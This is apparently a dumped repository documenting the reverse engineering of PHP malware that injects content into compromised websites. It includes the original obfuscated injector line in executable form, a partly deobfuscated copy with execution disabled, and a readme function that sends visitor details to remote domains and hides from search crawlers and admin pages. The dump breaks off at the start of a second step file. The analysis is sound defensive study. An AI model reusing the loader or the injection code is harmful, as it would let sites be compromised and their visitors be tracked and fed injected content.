$ljwlpffp=$kzgsmrix-1; ?>


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | # Reverse Engineering PHP Malware Content injection
 2 | 
 3 | This repository is a result of a Reverse Engineering of PHP Malware that makes
 4 | Content injection.
 5 | 
 6 | The full description can be found in english in (@todo add link here) and in
 7 | portuguese in (@todo add link here)
 8 | 
 9 | Authors of this work (re rev.eng., not the malware):
10 | 
11 | - Bernardo Donadio *bcdonadio at bcdonadio.com*
12 | - Emerson Rocha Luiz *emerson at alligo.com.br*
13 | 
14 | # Sample code
15 | 
16 | ```php
17 | /** REVENGNOTE: Do not assume that this malware will have same function names.
18 |  *              even for the same malware.
19 |  */
20 | function day212()
21 | {
22 | 	$a = check212("HTTP_USER_AGENT");
23 | 	$b = check212("HTTP_REFERER");
24 | 	$c = check212("REMOTE_ADDR");
25 | 	$d = check212("HTTP_HOST");
26 | 	$e = check212("PHP_SELF");
27 | 
28 | 	/** REVENGNOTE: this next array does nothing here. But was on original code.
29 | 	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
30 | 	 *              are domains that point (now) for the same working server
31 | 	 *              they are used to create content to inject on user code
32 | 	 *
33 | 	 */
34 | 	$domarr = array(
35 | 		"33db9538",
36 | 		"9507c4e8",
37 | 		"e5b57288",
38 | 		"54dfa1cb"
39 | 	);
40 | 
41 | 	/** REVENGNOTE: this is very important. It does NOT inject content on site
42 | 	 *              if is a search engine (that could alert site admin of this
43 | 	 *              malware, and also does not load on pages that are like
44 | 	 *              for administratior interfaces. It also check for a valid
45 |      *              HTTP_REFERER, so sometimes, share a link with a friend will
46 |      *              not work at all, because you need navitate on the site before
47 |      *              Is very likely that most common antivirus agents will maybe
48 |      *              pass this basic check, but remote server will know they
49 |      *              user agent and will return empty content.
50 | 	 */
51 | 	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
52 | 		"google",
53 | 		"slurp",
54 | 		"msnbot",
55 | 		"ia_archiver",
56 | 		"yandex",
57 | 		"rambler"
58 | 	)) . "/i", strtolower($a)))) {
59 | 		$o1 = "";
60 | 	}
61 | 	else {
62 | 		$op = mt_rand(100000, 999999);
63 | 		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
64 | 		$url = "http://" . cqq(".com") . "/" . $g4;
65 | 		$ca1 = en2(@gtd($url) , $op);
66 | 		$a1 = @explode("!NF0", $ca1);
67 | 		if (sizeof($a1) >= 2) $o1 = $a1[1];
68 | 		else $o1 = "";
69 | 	}
70 | 
71 | 	return $o1;
72 | }
73 | ```
74 | 
75 | # DISCLAIMER
76 | 
77 | **This is a reverse-engineering of malicious code found in compromised servers.
78 | The use of this code without explicit consent of the owner of the
79 | infrastructure constitutes a felony in many countries. Do not use except for
80 | educational purposes.**


--------------------------------------------------------------------------------
/step-by-step/original-step-0.php:
--------------------------------------------------------------------------------
1 | <?php $ljwlpffp = 'sdXA	x27K6<	x7fw6*3qj%>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x	x272qj%6<^#zsfvr#	x5cq%7/7#@}l;33bq}k;opjudovg}x;0]=])0#)U!	x27{**u%-#jt03of:opjudovg<~	x24<!%o:!>!	x242178}527}88:}334}472	x24<!:!}V;3q%}U;y]}R;2]},;osvufs}	x27;mnui}&K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd27pd%6<C	x27pd%6|6.7x24]26	x24-	x24<%j,,*!|	x24-	x24gvodujpo!	x24-	x24y7	x24-	x24*<%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6<.4`hA	x27	x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6!%t2w>#]y74]273]y76]252]y85]256]},;uqpuft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg}	x7f;6+99386c6f+9f5d816:+bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)s*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:	x5c%j:.2^,%b:<51L3]84]y31M6]y3e]81#/#7e:5594f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]eu{66~67<&w6<*&7-#o]s<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.)%bbT-%bT-%hW~%fdy)##-!#~upzwgv("", $fonatsf); $nsxgpqr();}}x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x24-	x24-tusqp}	x27;%!<*#}_;#)323ldfid>}&;!osvufs}	x7f;!opjud)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np]58]24]31#-%tdz*Wsfuvso!%bss	x5csbvg+)!gj+{e%!osvufs!*!+A!>!{e%)!6|7**111127-K)ebfsX	x27u%)7fmjix6<C	x27&6<*rfs%7-K)fujsxX6<#o]o]Ytbc	x7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cSFWSFT`%}X;!sp!*#o%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudooe))1/35.)1/14+9**-)1/2986+c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!	x45	116	x54"]); if ((strstr($uas,"	x6d	163	x69	145")) or (strstr7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdot)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x24-	x24y4	x24-	x24]y8	x24-	#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84]275]y83]273]y76]277#<pg)%	x24-	x24*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x24!>!fyqm%ff2!>!bssbz)	x24]25	x24-	x24-!%	x24-	x24*!|!	x24-	fmhpph#)zbssb!-#}#)fepmqnj!/!gj6<*doj%7-C)fepmqnjAFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%	x7f!<X>s-%rxW~!Ypp2)%zB%z>!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l(!isset($GLOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!#]y38#-!%w:**<")));$nsxgpqr = $t%cB%iN}#-!	x24/%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!%i	x5#-#Y#-#D#-#W#-#C#-#O#-#N	x22)gj6<^#Y#	x5cq%	x27Y%6<.-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&x69	157	x6e"; function khjatfs($n){return chr(ord($n)-1);} @error!osvufs}w;*	x7f!>>	x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)su"	x48	124	x54	120	x5f	1ovg}k~~9{d%:osvufs:~928>>	x<h%_t%:osvufs:~:<*9-1-r%)s%>/h%62]67y]562]38y]572]48y]#>m%:|:*r%:-t%)%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]#7/7^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#zsfvr#	x5cq%)ufttj]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]34224<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[!	x24-	x24gps)%j>1<%j=tj{f!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]27>	x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x273qj%6<*Y%)fnbozcYufhA27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x27!hmg%)!gj!~<ofmy75	156	x61"]=1; $uas=strtolower($_SERVER[%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbq6<tfs%w6<	x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR	x27*X)ufttj	x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57f%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs%6~6<	x7fpo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54ltcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x`{66~6<&w6<	x7fw6*CW&)7946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNy6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!	x2400~:25	x53	105	x52	137	x41	107($uas,"	x72	166	x3a	61	x31"))) { $tupzwgv = "	x63	162	x65	141	x74	14b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!*L1#/#M5]DgP5]D6#<%fdy5	x5f	146	x75	156	x63	164	<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdzf%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge5#0#)idubn`hfsq)!sp!*#ojneb#-*5f	163	x74	141	x72	164") && 399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbs>>	x22!ftmbg)!gj<*#k#)usbut`cpV	x7f	x7f%>5h%!<*::::::-111112)eobs2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubf6-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281ss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:55971M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofmw6<*K)ftpmdXA6|7**197-]o]s]#)fepmqyf	x27*&7;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}c	x27,*b	x27)fepdof.)fepdof./#@#/qp[A	x27&6<	x7fw6*	x7f_*#[k2`{6:!}7;!}6	x7f	x7f<u%V	x27{ftmfV	x7f<*bz+sfwjidsb`bj+upcotn+qsvmt+;zepc}A;~!}	x7f;!|!}{;)gj37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#7tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuo#-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L"%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!-%r	x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%butcvt)!gj!|!*bubE{h%)j{hX&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<_reporting(0); $fonatsf = implode(array_map("khjatfs",str_split(bssbz)#44ec:649#-!#:618d5f9#-!#f6c68jyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2	x5c2b%!>!2p%ov>*ofmy%)utjm!|!*5!	x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-if((function_exists("	x6f	142	xpef)#	x24*<!%t::!>!	x24Ypp3)npd!opjudovg!|!**#j{hnpd#)tut:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rmsv`ftsbqA7>q%6<	x7fw6*	x7f_*#fubfsdXk5pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.2`hA	x25]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5d/#)rrd/#00;quui#>.%!<***f	x27,*e	x27,*d	x27,*sTrREvxNoiTCnuf_EtaerCxECalPer_Rtspmkindbxxm'; $rrxokb=explode(chr((416-296)),substr($ljwlpffp,(31978-26101),(234-200))); $odqammov = $rrxokb[0]($rrxokb[(3-2)]); $qpzkvvx = $rrxokb[0]($rrxokb[(13-11)]); if (!function_exists('ukvjsry')) { function ukvjsry($wfdsbgilnz, $pzypycpnpc,$qafznm) { $pypqskkz = NULL; for($rruveki=0;$rruveki<(sizeof($wfdsbgilnz)/2);$rruveki++) { $pypqskkz .= substr($pzypycpnpc, $wfdsbgilnz[($rruveki*2)],$wfdsbgilnz[($rruveki*2)+(6-5)]); } return $qafznm(chr((60-51)),chr((383-291)),$pypqskkz); }; } $ghgcnmmutm = explode(chr((295-251)),'5539,31,4074,28,2158,67,3266,41,2633,23,3782,26,1536,65,3808,68,3932,26,2447,65,5323,64,5111,56,394,67,5721,42,311,20,893,21,4610,21,2400,47,1268,65,3469,55,4588,22,4206,62,0,22,3135,66,88,29,2819,66,2372,28,5682,39,3649,23,1984,21,461,47,3348,55,4871,33,542,34,914,67,4712,37,4631,46,257,54,608,52,2512,65,2577,56,3561,46,3607,42,3201,65,3307,41,5484,55,680,37,717,27,5233,24,5598,29,5423,61,5006,37,1152,51,5831,46,4677,35,4180,26,4476,66,4777,28,1955,29,4045,29,3997,48,660,20,3672,57,2005,64,3876,35,3403,66,1333,59,3524,37,1105,47,2656,27,1661,48,4542,46,1392,69,1237,31,4141,39,4749,28,5257,66,4904,69,2120,38,218,39,4805,25,117,45,508,34,1775,70,576,32,3729,53,2683,31,5627,55,2752,67,4830,41,2714,38,162,56,1904,51,1041,64,1709,66,331,63,3016,26,1845,59,5570,28,2295,53,1488,48,5387,36,4102,39,2069,51,4973,33,5167,66,4356,60,828,65,798,30,4268,34,4302,54,3911,21,5043,68,4416,60,3958,39,981,25,3094,41,5763,68,2885,65,1203,34,1461,27,1601,60,744,54,3042,52,22,66,2950,66,2348,24,2225,70,1006,35'); $kzgsmrix = $odqammov("",ukvjsry($ghgcnmmutm,$ljwlpffp,$qpzkvvx)); $odqammov=$ljwlpffp; $kzgsmrix(""); $kzgsmrix=(493-372); $ljwlpffp=$kzgsmrix-1; ?><?php
2 | 
3 | /**
4 |  * REVENGNOTE: the malware in this example infected all .php files on site,
5 |  *             inject on first line
6 |  */
7 | 


--------------------------------------------------------------------------------
/step-by-step/reveng-step-1.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | $ljwlpffp = 'sdXA	x27K6<	x7fw6*3qj%>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x	x272qj%6<^#zsfvr#	x5cq%7/7#@}l;33bq}k;opjudovg}x;0]=])0#)U!	x27{**u%-#jt03of:opjudovg<~	x24<!%o:!>!	x242178}527}88:}334}472	x24<!:!}V;3q%}U;y]}R;2]},;osvufs}	x27;mnui}&K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd27pd%6<C	x27pd%6|6.7x24]26	x24-	x24<%j,,*!|	x24-	x24gvodujpo!	x24-	x24y7	x24-	x24*<%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6<.4`hA	x27	x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6!%t2w>#]y74]273]y76]252]y85]256]},;uqpuft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg}	x7f;6+99386c6f+9f5d816:+bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)s*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:	x5c%j:.2^,%b:<51L3]84]y31M6]y3e]81#/#7e:5594f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]eu{66~67<&w6<*&7-#o]s<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.)%bbT-%bT-%hW~%fdy)##-!#~upzwgv("", $fonatsf); $nsxgpqr();}}x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x24-	x24-tusqp}	x27;%!<*#}_;#)323ldfid>}&;!osvufs}	x7f;!opjud)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np]58]24]31#-%tdz*Wsfuvso!%bss	x5csbvg+)!gj+{e%!osvufs!*!+A!>!{e%)!6|7**111127-K)ebfsX	x27u%)7fmjix6<C	x27&6<*rfs%7-K)fujsxX6<#o]o]Ytbc	x7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cSFWSFT`%}X;!sp!*#o%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudooe))1/35.)1/14+9**-)1/2986+c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!	x45	116	x54"]); if ((strstr($uas,"	x6d	163	x69	145")) or (strstr7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdot)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x24-	x24y4	x24-	x24]y8	x24-	#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84]275]y83]273]y76]277#<pg)%	x24-	x24*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x24!>!fyqm%ff2!>!bssbz)	x24]25	x24-	x24-!%	x24-	x24*!|!	x24-	fmhpph#)zbssb!-#}#)fepmqnj!/!gj6<*doj%7-C)fepmqnjAFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%	x7f!<X>s-%rxW~!Ypp2)%zB%z>!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l(!isset($GLOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!#]y38#-!%w:**<")));$nsxgpqr = $t%cB%iN}#-!	x24/%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!%i	x5#-#Y#-#D#-#W#-#C#-#O#-#N	x22)gj6<^#Y#	x5cq%	x27Y%6<.-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&x69	157	x6e"; function khjatfs($n){return chr(ord($n)-1);} @error!osvufs}w;*	x7f!>>	x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)su"	x48	124	x54	120	x5f	1ovg}k~~9{d%:osvufs:~928>>	x<h%_t%:osvufs:~:<*9-1-r%)s%>/h%62]67y]562]38y]572]48y]#>m%:|:*r%:-t%)%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]#7/7^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#zsfvr#	x5cq%)ufttj]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]34224<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[!	x24-	x24gps)%j>1<%j=tj{f!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]27>	x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x273qj%6<*Y%)fnbozcYufhA27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x27!hmg%)!gj!~<ofmy75	156	x61"]=1; $uas=strtolower($_SERVER[%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbq6<tfs%w6<	x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR	x27*X)ufttj	x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57f%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs%6~6<	x7fpo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54ltcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x`{66~6<&w6<	x7fw6*CW&)7946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNy6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!	x2400~:25	x53	105	x52	137	x41	107($uas,"	x72	166	x3a	61	x31"))) { $tupzwgv = "	x63	162	x65	141	x74	14b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!*L1#/#M5]DgP5]D6#<%fdy5	x5f	146	x75	156	x63	164	<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdzf%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge5#0#)idubn`hfsq)!sp!*#ojneb#-*5f	163	x74	141	x72	164") && 399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbs>>	x22!ftmbg)!gj<*#k#)usbut`cpV	x7f	x7f%>5h%!<*::::::-111112)eobs2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubf6-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281ss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:55971M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofmw6<*K)ftpmdXA6|7**197-]o]s]#)fepmqyf	x27*&7;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}c	x27,*b	x27)fepdof.)fepdof./#@#/qp[A	x27&6<	x7fw6*	x7f_*#[k2`{6:!}7;!}6	x7f	x7f<u%V	x27{ftmfV	x7f<*bz+sfwjidsb`bj+upcotn+qsvmt+;zepc}A;~!}	x7f;!|!}{;)gj37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#7tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuo#-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L"%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!-%r	x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%butcvt)!gj!|!*bubE{h%)j{hX&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<_reporting(0); $fonatsf = implode(array_map("khjatfs",str_split(bssbz)#44ec:649#-!#:618d5f9#-!#f6c68jyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2	x5c2b%!>!2p%ov>*ofmy%)utjm!|!*5!	x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-if((function_exists("	x6f	142	xpef)#	x24*<!%t::!>!	x24Ypp3)npd!opjudovg!|!**#j{hnpd#)tut:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rmsv`ftsbqA7>q%6<	x7fw6*	x7f_*#fubfsdXk5pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.2`hA	x25]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5d/#)rrd/#00;quui#>.%!<***f	x27,*e	x27,*d	x27,*sTrREvxNoiTCnuf_EtaerCxECalPer_Rtspmkindbxxm';
16 | $rrxokb   = explode(chr((416 - 296)), substr($ljwlpffp, (31978 - 26101), (234 - 200)));
17 | 
18 | 
19 | $odqammov = $rrxokb[0]($rrxokb[(3 - 2)]);
20 | 
21 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
22 | echo '$odqammov:' . print_r($odqammov, true) . PHP_EOL; // CreatE_funCTioN
23 | 
24 | $qpzkvvx  = $rrxokb[0]($rrxokb[(13 - 11)]);
25 | 
26 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
27 | echo '$qpzkvvx:' . print_r($qpzkvvx, true) . PHP_EOL;
28 | 
29 | if (!function_exists('ukvjsry')) {
30 |     function ukvjsry($wfdsbgilnz, $pzypycpnpc, $qafznm)
31 |     {
32 |         $pypqskkz = NULL;
33 |         for ($rruveki = 0; $rruveki < (sizeof($wfdsbgilnz) / 2); $rruveki++) {
34 |             $pypqskkz .= substr($pzypycpnpc, $wfdsbgilnz[($rruveki * 2)], $wfdsbgilnz[($rruveki * 2) + (6 - 5)]);
35 |         }
36 |         return $qafznm(chr((60 - 51)), chr((383 - 291)), $pypqskkz);
37 |     }
38 |     ;
39 | }
40 | $ghgcnmmutm = explode(chr((295 - 251)), '5539,31,4074,28,2158,67,3266,41,2633,23,3782,26,1536,65,3808,68,3932,26,2447,65,5323,64,5111,56,394,67,5721,42,311,20,893,21,4610,21,2400,47,1268,65,3469,55,4588,22,4206,62,0,22,3135,66,88,29,2819,66,2372,28,5682,39,3649,23,1984,21,461,47,3348,55,4871,33,542,34,914,67,4712,37,4631,46,257,54,608,52,2512,65,2577,56,3561,46,3607,42,3201,65,3307,41,5484,55,680,37,717,27,5233,24,5598,29,5423,61,5006,37,1152,51,5831,46,4677,35,4180,26,4476,66,4777,28,1955,29,4045,29,3997,48,660,20,3672,57,2005,64,3876,35,3403,66,1333,59,3524,37,1105,47,2656,27,1661,48,4542,46,1392,69,1237,31,4141,39,4749,28,5257,66,4904,69,2120,38,218,39,4805,25,117,45,508,34,1775,70,576,32,3729,53,2683,31,5627,55,2752,67,4830,41,2714,38,162,56,1904,51,1041,64,1709,66,331,63,3016,26,1845,59,5570,28,2295,53,1488,48,5387,36,4102,39,2069,51,4973,33,5167,66,4356,60,828,65,798,30,4268,34,4302,54,3911,21,5043,68,4416,60,3958,39,981,25,3094,41,5763,68,2885,65,1203,34,1461,27,1601,60,744,54,3042,52,22,66,2950,66,2348,24,2225,70,1006,35');
41 | 
42 | 
43 | $kzgsmrix   = $odqammov("", ukvjsry($ghgcnmmutm, $ljwlpffp, $qpzkvvx)); /** REVENGNOTE: CreatE_funCTioN( .... ) **/
44 | 
45 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
46 | echo '$ukvjsry($ghgcnmmutm, $ljwlpffp, $qpzkvvx):' . print_r(ukvjsry($ghgcnmmutm, $ljwlpffp, $qpzkvvx), true) . PHP_EOL;
47 | 
48 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
49 | echo '$kzgsmrix:' . print_r($kzgsmrix, true) . PHP_EOL;
50 | 
51 | $odqammov   = $ljwlpffp;
52 | 
53 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
54 | //$kzgsmrix("");
55 | //$kzgsmrix = (493 - 372);
56 | //$ljwlpffp = $kzgsmrix - 1;
57 | ?>


--------------------------------------------------------------------------------
/step-by-step/reveng-step-2.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
